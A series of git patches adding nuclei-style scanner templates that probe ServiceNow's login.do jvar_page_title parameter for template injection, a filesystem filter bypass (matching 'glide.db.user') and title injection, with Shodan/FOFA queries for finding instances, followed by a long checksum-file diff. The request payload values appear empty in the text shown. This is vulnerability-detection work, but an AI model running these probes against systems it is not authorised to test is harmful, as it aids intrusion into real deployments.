9723a8da6a5986339674b9e016a6f35a46e23ed5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:04:11 +0530 Subject: [PATCH 038/247] Create servicenow-ssti.yaml --- http/misconfiguration/servicenow-ssti.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 http/misconfiguration/servicenow-ssti.yaml diff --git a/http/misconfiguration/servicenow-ssti.yaml b/http/misconfiguration/servicenow-ssti.yaml new file mode 100644 index 00000000000..a13e8f3d8a0 --- /dev/null +++ b/http/misconfiguration/servicenow-ssti.yaml @@ -0,0 +1,20 @@ +id: servicenow-ssti + +info: + name: Service Now - Template Injection Mitigation Bypass + author: DhiyaneshDk + severity: high + + +http: + - raw: + - | + GET /login.do?jvar_page_title= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '
49
' From 91796a0662fb0ef614de7dafdcf05e412ce60a5a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:04:51 +0530 Subject: [PATCH 039/247] fix lint --- http/misconfiguration/servicenow-ssti.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/misconfiguration/servicenow-ssti.yaml b/http/misconfiguration/servicenow-ssti.yaml index a13e8f3d8a0..b296cd8177e 100644 --- a/http/misconfiguration/servicenow-ssti.yaml +++ b/http/misconfiguration/servicenow-ssti.yaml @@ -5,13 +5,12 @@ info: author: DhiyaneshDk severity: high - http: - raw: - | GET /login.do?jvar_page_title= HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word From dfdc32e3a1947c1835ba39847bd59e9fc58a8f7c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:18:03 +0530 Subject: [PATCH 040/247] Create servicenow-filesystem-bypass.yaml --- .../servicenow-filesystem-bypass.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 http/misconfiguration/servicenow-filesystem-bypass.yaml diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/misconfiguration/servicenow-filesystem-bypass.yaml new file mode 100644 index 00000000000..13c1ab80cac --- /dev/null +++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml @@ -0,0 +1,19 @@ +id: servicenow-filesystem-bypass + +info: + name: Service Now - Filesystem Filter Bypass + author: DhiyaneshDk + severity: high + +http: + - raw: + - | + GET /login.do?jvar_page_title= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'db.user' From 20cb50d9f3104c9e48b855b2b62b9aa9489b695a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:43:50 +0530 Subject: [PATCH 041/247] minor-update --- .../servicenow-filesystem-bypass.yaml | 32 +++++++++++++++++-- 1 file changed, 29 insertions(+), 3 deletions(-) diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/misconfiguration/servicenow-filesystem-bypass.yaml index 13c1ab80cac..77ef0440cd4 100644 --- a/http/misconfiguration/servicenow-filesystem-bypass.yaml +++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml @@ -4,16 +4,42 @@ info: name: Service Now - Filesystem Filter Bypass author: DhiyaneshDk severity: high + reference: + - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data + classification: + cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: servicenow + product: servicenow + shodan-query: + - http.favicon.hash:1701804003 + - http.title:"servicenow" + fofa-query: + - icon_hash=1701804003 + - title="servicenow" + google-query: intitle:"servicenow" + tags: cve,cve2024,servicenow,rce http: - raw: - | - GET /login.do?jvar_page_title= HTTP/1.1 + GET /login.do?jvar_page_title= HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word part: body words: - - 'db.user' + - "glide.db.user" + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 From 7871d3c2957f3c025e4836c77dbf3a6e93c015b3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:44:32 +0530 Subject: [PATCH 042/247] minor update --- http/misconfiguration/servicenow-ssti.yaml | 26 ++++++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/http/misconfiguration/servicenow-ssti.yaml b/http/misconfiguration/servicenow-ssti.yaml index b296cd8177e..e6b547a56fb 100644 --- a/http/misconfiguration/servicenow-ssti.yaml +++ b/http/misconfiguration/servicenow-ssti.yaml @@ -4,6 +4,23 @@ info: name: Service Now - Template Injection Mitigation Bypass author: DhiyaneshDk severity: high + reference: + - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data + classification: + cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: servicenow + product: servicenow + shodan-query: + - http.favicon.hash:1701804003 + - http.title:"servicenow" + fofa-query: + - icon_hash=1701804003 + - title="servicenow" + google-query: intitle:"servicenow" + tags: cve,cve2024,servicenow,ssti http: - raw: @@ -17,3 +34,12 @@ http: part: body words: - '
49
' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 From 054c42c8cf1ca490df88e2f933814879f4b5dab8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:45:32 +0530 Subject: [PATCH 043/247] minor update --- .../servicenow-title-injection.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml index 19cec8bdd17..f1957d4b6fe 100644 --- a/http/misconfiguration/servicenow-title-injection.yaml +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -4,6 +4,23 @@ info: name: Service Now - Title Injection author: DhiyaneshDk severity: high + reference: + - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data + classification: + cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: servicenow + product: servicenow + shodan-query: + - http.favicon.hash:1701804003 + - http.title:"servicenow" + fofa-query: + - icon_hash=1701804003 + - title="servicenow" + google-query: intitle:"servicenow" + tags: cve,cve2024,servicenow,injection http: - raw: @@ -17,3 +34,12 @@ http: part: body words: - '<style><foo>abc</foo></style>' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 From 36aff773733b7a6573b23e4334cc2341034da216 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 12:48:08 +0530 Subject: [PATCH 044/247] fix-trail-space --- http/misconfiguration/servicenow-filesystem-bypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/misconfiguration/servicenow-filesystem-bypass.yaml index 77ef0440cd4..ff155f4152c 100644 --- a/http/misconfiguration/servicenow-filesystem-bypass.yaml +++ b/http/misconfiguration/servicenow-filesystem-bypass.yaml @@ -27,7 +27,7 @@ http: - | GET /login.do?jvar_page_title= HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word From 096ea974e007a02a22a14c05d95210772c540f43 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Jul 2024 07:21:49 +0000 Subject: [PATCH 045/247] Auto Generated New Template Addition List [Thu Jul 11 07:21:49 UTC 2024] :robot: From f8d0ba3a785d17b115d6f4fe1d24b768dfdc0afe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 07:22:02 +0000 Subject: [PATCH 046/247] Auto Generated Templates Checksum [Thu Jul 11 07:22:02 UTC 2024] :robot: --- templates-checksum.txt | 430 ++++++++++++++++++++--------------------- 1 file changed, 215 insertions(+), 215 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6936b1d38ab..5b3ffd1130e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -737,7 +737,7 @@ helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d helpers/wordpress/plugins/admin-menu-editor.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 helpers/wordpress/plugins/advanced-custom-fields.txt:a7fbd6d327737c06c4df75324d67f7a31797d931 -helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb +helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:a0d8efde6c39ba693651a975ac3b93c16ed3d566 helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0e7857ba95ff2de @@ -792,7 +792,7 @@ helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd9 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:4a75639c283b56053860c27e1607b76f949fbb7a helpers/wordpress/plugins/ewww-image-optimizer.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa -helpers/wordpress/plugins/facebook-for-woocommerce.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 +helpers/wordpress/plugins/facebook-for-woocommerce.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce @@ -800,7 +800,7 @@ helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd3 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 helpers/wordpress/plugins/formidable.txt:4c8c0a65f9f10ab6175d297b0d38cb82de78d3a8 -helpers/wordpress/plugins/forminator.txt:6ee02b82336e55125a24970b177a069b10306436 +helpers/wordpress/plugins/forminator.txt:0b6a16f2a55e024ce70078ac1af9191ccab9fc42 helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c @@ -826,7 +826,7 @@ helpers/wordpress/plugins/insert-headers-and-footers.txt:b02d54c37a0b10952ea1019 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c -helpers/wordpress/plugins/jetpack-boost.txt:6296d4732b242d110df8dee2fc52e75587f5910b +helpers/wordpress/plugins/jetpack-boost.txt:0378155bec7f85b13304474a2e6dc6c7797689bc helpers/wordpress/plugins/jetpack.txt:60a854f8bf5e45303554786e4d93e54911b7eb31 helpers/wordpress/plugins/kadence-blocks.txt:ff9c051b520ac807402f74294d9ef63ab68c6b88 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d @@ -868,19 +868,19 @@ helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef7 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d helpers/wordpress/plugins/post-smtp.txt:aecdd619817528f6e7764e982d8df1aafa8a7175 helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d -helpers/wordpress/plugins/premium-addons-for-elementor.txt:e95d97da8a2ce341d64e208ea599b9a4c7584ef9 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:d45042d6a26130a25d35761ed77b4b0bc720ab44 helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad90770264d helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 -helpers/wordpress/plugins/royal-elementor-addons.txt:7bed2a141156e4ba7df86140b29e73a2f48c1f0a +helpers/wordpress/plugins/royal-elementor-addons.txt:d23cb39919efcacdfc1a634287181ffd084f7d0f helpers/wordpress/plugins/safe-svg.txt:5da596d45f9d6516efc24f110a7c87475a984016 -helpers/wordpress/plugins/seo-by-rank-math.txt:5bf51483cdbf6af88985eb92aeb46c696e503716 -helpers/wordpress/plugins/sg-cachepress.txt:04035664301b06859586cb750fd8f8ad988856ea +helpers/wordpress/plugins/seo-by-rank-math.txt:85bea03724452599fd9bc595e166c423d5268bae +helpers/wordpress/plugins/sg-cachepress.txt:bdca50b5cb1feb03950b48f4419acb02a57783cb helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 -helpers/wordpress/plugins/shortcodes-ultimate.txt:bd1b35ea2c8692269da8a819c39a7433032177ea +helpers/wordpress/plugins/shortcodes-ultimate.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b helpers/wordpress/plugins/simple-history.txt:ee49c41e728b7af9b4fa9de669951863a79a98b1 @@ -919,7 +919,7 @@ helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930c helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c -helpers/wordpress/plugins/woocommerce-payments.txt:373a109947826f162ef5dba14dc054105c72c5ca +helpers/wordpress/plugins/woocommerce-payments.txt:0ff9f22422909931ae84d9591d77f81147106c05 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e @@ -945,7 +945,7 @@ helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c helpers/wordpress/plugins/wp-statistics.txt:eaf1c1bdfba4abe49a572dfe88b7618f7fedd9f4 -helpers/wordpress/plugins/wp-super-cache.txt:f84939ff21a1ffe63d6f3e405737228a6e174657 +helpers/wordpress/plugins/wp-super-cache.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a @@ -984,6 +984,7 @@ http/cnvd/2021/CNVD-2021-33202.yaml:456cb1010d88aa9d66fe49b798317401e910bba4 http/cnvd/2021/CNVD-2021-41972.yaml:49971c05dd60e8d14f8d2c7eb92cdad18f62d3b4 http/cnvd/2021/CNVD-2021-43984.yaml:e6c70dfee97d7b8446455c82c402305c19a27a73 http/cnvd/2021/CNVD-2021-49104.yaml:f766f0c4ece9bdf09fb8ca471323937485dce9c3 +http/cnvd/2021/CNVD-2021-64035.yaml:e493efb6fa600cb2680bb596660d680642c1afbd http/cnvd/2022/CNVD-2022-03672.yaml:f4d4974170f405875cfc0cd6f61574e1a39b2772 http/cnvd/2022/CNVD-2022-42853.yaml:3a6672aeea87cae4f92e10b0c2502fb5f367967d http/cnvd/2022/CNVD-2022-43245.yaml:5517d85329dd0ed3f1e7ad377a975304030ce66b @@ -993,7 +994,6 @@ http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 -http/cnvd/2024/CNVD-2021-64035.yaml:101bc2035763e358d63266a80193de575b376202 http/cnvd/2024/CNVD-2024-15077.yaml:d97b1860e5154481146b5ebaf48f57448f62ecd1 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:8362d36f1fa45da68449901d392ba84be2f4a368 @@ -3273,7 +3273,7 @@ http/cves/2023/CVE-2023-4173.yaml:7a186ce21f79cc2aaf602f20096b3da265eea94e http/cves/2023/CVE-2023-4174.yaml:6d9b3231d2c766eb63eedeb04b924000b7999e4e http/cves/2023/CVE-2023-41763.yaml:b428682d889984946edc1203e1c240b9c5ae4137 http/cves/2023/CVE-2023-41892.yaml:1e501e0ef2d2102d6c865fe4547501649ec2164c -http/cves/2023/CVE-2023-4220.yaml:37f85450f2c470ce7c25e52facf939eb511460d2 +http/cves/2023/CVE-2023-4220.yaml:13a9dc65ed2ac07fbf9e1e8170cf1a1823fad370 http/cves/2023/CVE-2023-42343.yaml:69a0589c7e96b3ae72a73dc5610cd79f60246440 http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 http/cves/2023/CVE-2023-42442.yaml:5ea1d0998ecaa52c2608185126326ef0ea979314 @@ -7265,7 +7265,7 @@ http/technologies/vmware/vmware-detect.yaml:4f8fbfc3da99dc2f1d4b5294463c24adbd58 http/technologies/vmware/vmware-horizon-version.yaml:86445c8b1d7b19b717cf68e6135f1801214018af http/technologies/vmware/vmware-site-recovery-manager.yaml:206cc779975a1e77b16422af0454f4b370f18a73 http/technologies/vmware/vmware-vrealize-detect.yaml:b284b80bdd27cc66d9c343300bfc273448c724a6 -http/technologies/waf-detect.yaml:0cce0b5669bc9d6874ee987a9c4daed3f801c13a +http/technologies/waf-detect.yaml:1da278f80d64f754fafb85c371b6ed2734a603ee http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d @@ -7273,228 +7273,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:1d3daa4fced7cba53de91f9333f36dffaf721359 -http/technologies/wordpress/plugins/add-to-any.yaml:7e4eb601c49f530b00d722ad97c274f4478a06ad -http/technologies/wordpress/plugins/admin-menu-editor.yaml:bee28db0ae68a8de5183fae2542a7d9bc8d765b5 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:ba0e9871144fd0b0d420b5a2cbedb9eafb6149c0 -http/technologies/wordpress/plugins/akismet.yaml:80f5ba260bbea37b15fe50e21b5585276ed71451 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:3d00a7e81c3a89e1657ac4c1407088ab1f7c0420 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c72d2cc6ca972e24b260919836aa1ee318ab5aa6 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:cdbfba51fd54139e05f4d672c364100b370fb2c0 -http/technologies/wordpress/plugins/amp.yaml:fb1463b9327f4c761b767e52c989def666baf6f1 -http/technologies/wordpress/plugins/antispam-bee.yaml:6c337649c1dfaa5189fdc903962f59ab4fcc05c7 -http/technologies/wordpress/plugins/astra-sites.yaml:602677b732ff73126a23eba10af22c4fa9fed271 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:17d9540bcc6f421d2fc06e2beccc3c643c30688c -http/technologies/wordpress/plugins/backwpup.yaml:04718d6debd52c9cbf69d4b5d25f617342e97952 -http/technologies/wordpress/plugins/better-search-replace.yaml:4dd76b130af5f36edd18d8ed4010b07cf058f05b -http/technologies/wordpress/plugins/better-wp-security.yaml:4b473eefd957524ee2669d1288936267a66893a6 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:1898207c9714400cfc93ca177d99c8ad969bd440 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:a26b7304de08391e139d60d0e68eb64b5727cd4a -http/technologies/wordpress/plugins/breeze.yaml:700c0a041d4b6edd05120c3522fc8193906d0207 -http/technologies/wordpress/plugins/broken-link-checker.yaml:708cec18254cf9d214c46ebcf0a8becebbccba3a -http/technologies/wordpress/plugins/chaty.yaml:984e86614098d96082d78217b564d32dda624250 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5535e5e0c7421abbc66584c3f14a350169f108b7 -http/technologies/wordpress/plugins/classic-editor.yaml:d5427d073b0eca3fc369ea6ce069f338cf2384a4 -http/technologies/wordpress/plugins/classic-widgets.yaml:415736adb6fd77079c585086eea8887fd668bdd9 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:d87a03a0c7bc258e45ec21aa7584ac0278058515 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:a554ce79ca315a2cd8963d93225c9f66e4d9fada -http/technologies/wordpress/plugins/coblocks.yaml:b34714784864a8f38795e08627de0c7231743452 -http/technologies/wordpress/plugins/code-snippets.yaml:0bc301b1b7a14ca79fc184e350b395c161074582 -http/technologies/wordpress/plugins/coming-soon.yaml:968a7b247662f4f5817e5506c597a6e323e1f126 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:caa91d75b64b6aad60044bb56a27304f32d5d01e -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:3c663a2794774b365474aabec4891dd2e46ca900 -http/technologies/wordpress/plugins/contact-form-7.yaml:2ad112eb1770d0a37b26f48348b7031f4c528c3b -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:5b4480ee1edb65cd1c22d57bbadb26f6ec5efd11 -http/technologies/wordpress/plugins/cookie-law-info.yaml:af3e63ff56240d912bfdc65144ee6c19c4335004 -http/technologies/wordpress/plugins/cookie-notice.yaml:431f3418241d7a25e492f3187e7ddada693e9676 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:25626c794b80a4407b29afc9c053ae4f747f8efd -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:155f3a6bb68459d0a47a08c3509ffab6356e39a0 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d5f36274ece63a40f6c8e5df41d1c7c9a8e627b6 -http/technologies/wordpress/plugins/custom-css-js.yaml:1f4c9718ab27b50d62a5c79222c18474b53234ec -http/technologies/wordpress/plugins/custom-fonts.yaml:3a217060f1b59ceaa4ce039baece76dbbca03a97 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:1481eded972c802c73e166efbc398b1e64cb51cd -http/technologies/wordpress/plugins/disable-comments.yaml:243676d865b0b7d4881a0bbd99ef711e82ea5713 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:f12b1011be280c9f35f1c214d60e2dc5efc2b1f6 -http/technologies/wordpress/plugins/duplicate-page.yaml:1b84011f66bb4baf9aaf32ecd85c77dced2203b1 -http/technologies/wordpress/plugins/duplicate-post.yaml:9aab0e90ef6c788d48d8106a3dc4715f53cb49c3 -http/technologies/wordpress/plugins/duplicator.yaml:bb9f0d66eaa77fa7f0326d94a8df218a73575aa9 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:4cc1012123a2da982cf6be18208d50c68479f1fa +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 